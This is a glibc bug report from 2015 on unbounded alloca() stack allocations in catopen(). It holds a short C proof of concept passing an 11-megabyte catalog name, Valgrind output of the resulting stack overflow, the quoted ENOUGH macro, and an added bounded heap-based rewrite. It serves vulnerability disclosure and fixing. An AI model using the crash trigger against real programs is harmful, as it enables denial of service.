This is the mail archive of the
glibc-bugs@sourceware.org
mailing list for the glibc project.
[Bug libc/17905] New: catopen() Multiple unbounded stack allocations
- From: "max at cxib dot net" <sourceware-bugzilla at sourceware dot org>
- To: glibc-bugs at sourceware dot org
- Date: Thu, 29 Jan 2015 22:10:05 +0000
- Subject: [Bug libc/17905] New: catopen() Multiple unbounded stack allocations
- Auto-submitted: auto-generated
https://sourceware.org/bugzilla/show_bug.cgi?id=17905
Bug ID: 17905
Summary: catopen() Multiple unbounded stack allocations
Product: glibc
Version: 2.20
Status: NEW
Severity: normal
Priority: P2
Component: libc
Assignee: unassigned at sourceware dot org
Reporter: max at cxib dot net
CC: drepper.fsp at gmail dot com
Reference:
https://sourceware.org/bugzilla/show_bug.cgi?id=17897
PoC:
#include <nl_types.h>
#include <string.h>
#include <stdlib.h>

int main(void)
{
  char *buff;

  /* Build an 11,111,110-byte catalog name.  __open_catalog copies it into
     an alloca()'d buffer (see the ENOUGH macro below), which blows past the
     8 MB main-thread stack and crashes with SIGSEGV. */
  buff = malloc(11111111);
  if (buff == NULL)
    return 1;
  memset(buff, 'A', 11111110);
  buff[11111110] = '\0';
  catopen(buff, NL_CAT_LOCALE);
  free(buff);
  return 0;
}
========================
==25788== Memcheck, a memory error detector
==25788== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==25788== Using Valgrind-3.10.0.SVN and LibVEX; rerun with -h for copyright info
==25788== Command: ./cato
==25788==
==25788== Warning: client switching stacks? SP change: 0xfff000330 --> 0xffe567648
==25788== to suppress, use: --max-stackframe=11111656 or greater
==25788== Invalid write of size 8
==25788== at 0x4E6CD5A: __open_catalog (open_catalog.c:102)
==25788== by 0x4E6C38E: catopen (catgets.c:71)
==25788== by 0x400616: main (in /home/kalibaba/cato)
==25788== Address 0xffe567648 is on thread 1's stack
==25788==
==25788==
==25788== Process terminating with default action of signal 11 (SIGSEGV)
==25788== Access not within mapped region at address 0xFFE567648
==25788== at 0x4E6CD5A: __open_catalog (open_catalog.c:102)
==25788== If you believe this happened as a result of a stack
==25788== overflow in your program's main thread (unlikely but
==25788== possible), you can try to increase the size of the
==25788== main thread stack using the --main-stacksize= flag.
==25788== The main thread stack size used in this run was 8388608.
========================
open_catalog.c
#define ENOUGH(n) \
  if (__builtin_expect (bufact + (n) >= bufmax, 0)) \
    { \
      char *old_buf = buf; \
      bufmax += 256 + (n); \
      buf = (char *) alloca (bufmax); \
      <===============
      memcpy (buf, old_buf, bufact); \
    }
and other alloca() calls in catopen()
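A bounded counterpart of the ENOUGH(n) growth step, added here as a constructed example (it is not glibc's code or its eventual fix): a small fixed stack reserve replaces alloca and anything larger moves to the heap, so an oversized catalog name can no longer exhaust the stack. STACK_RESERVE, growbuf and build_catalog_path are assumed names.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Constructed example, not glibc's code: a bounded version of ENOUGH(n).
   The stack holds only a fixed reserve; growth beyond it goes to the heap. */
#define STACK_RESERVE 256            /* assumption: on-stack reserve size */

struct growbuf {
    char fixed[STACK_RESERVE];
    char *buf;                       /* fixed[] or a heap block */
    size_t bufact, bufmax;           /* bytes used / bytes available */
};

static void growbuf_init(struct growbuf *g)
{ g->buf = g->fixed; g->bufact = 0; g->bufmax = sizeof g->fixed; }

/* Same growth rule as ENOUGH(n) (bufmax += 256 + n), but heap, not alloca.
   Invariant: bufact < bufmax, so the subtraction cannot wrap. */
static int growbuf_reserve(struct growbuf *g, size_t n)
{
    if (n < g->bufmax - g->bufact) return 0;           /* room already */
    if (n > SIZE_MAX - g->bufmax - 256) return -1;      /* size overflow */
    size_t newmax = g->bufmax + 256 + n;
    char *nb = (g->buf == g->fixed) ? malloc(newmax) : realloc(g->buf, newmax);
    if (nb == NULL) return -1;                          /* old buf still valid */
    if (g->buf == g->fixed) memcpy(nb, g->fixed, g->bufact);
    g->buf = nb; g->bufmax = newmax;
    return 0;
}

static int growbuf_append(struct growbuf *g, const char *s, size_t len)
{
    if (growbuf_reserve(g, len + 1) != 0) return -1;
    memcpy(g->buf + g->bufact, s, len);
    g->bufact += len;
    g->buf[g->bufact] = '\0';
    return 0;
}

static void growbuf_free(struct growbuf *g)
{ if (g->buf != g->fixed) free(g->buf); growbuf_init(g); }

/* Assembles "<dir>/<name>.cat" the way an NLSPATH entry is expanded.
   Returns the resulting length or -1 on allocation failure; *used_heap
   reports whether the stack reserve was exceeded. */
long build_catalog_path(const char *dir, const char *name, int *used_heap)
{
    struct growbuf g; growbuf_init(&g);
    long len = -1;
    if (growbuf_append(&g, dir, strlen(dir)) == 0 && growbuf_append(&g, "/", 1) == 0 &&
        growbuf_append(&g, name, strlen(name)) == 0 && growbuf_append(&g, ".cat", 4) == 0)
        len = (long) g.bufact;
    *used_heap = (g.buf != g.fixed);
    growbuf_free(&g);
    return len;
}
```

Feeding it the PoC's 11,111,110-byte name exercises the heap path and returns normally instead of faulting.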